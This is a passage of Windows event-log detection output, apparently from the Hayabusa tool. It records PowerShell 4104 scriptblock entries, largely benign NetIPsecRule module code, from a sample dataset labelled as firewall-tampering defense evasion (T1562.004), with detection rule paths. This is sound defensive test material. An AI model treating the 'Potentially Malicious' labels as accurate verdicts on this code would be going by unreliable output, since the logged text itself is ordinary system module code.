[System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetIPsecRule' -Alias '*' function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Binding",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"s = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Find-NetIPsecRule' -Alias '*' function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSet",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"s = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Find-NetIPsecRule' -Alias '*' function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 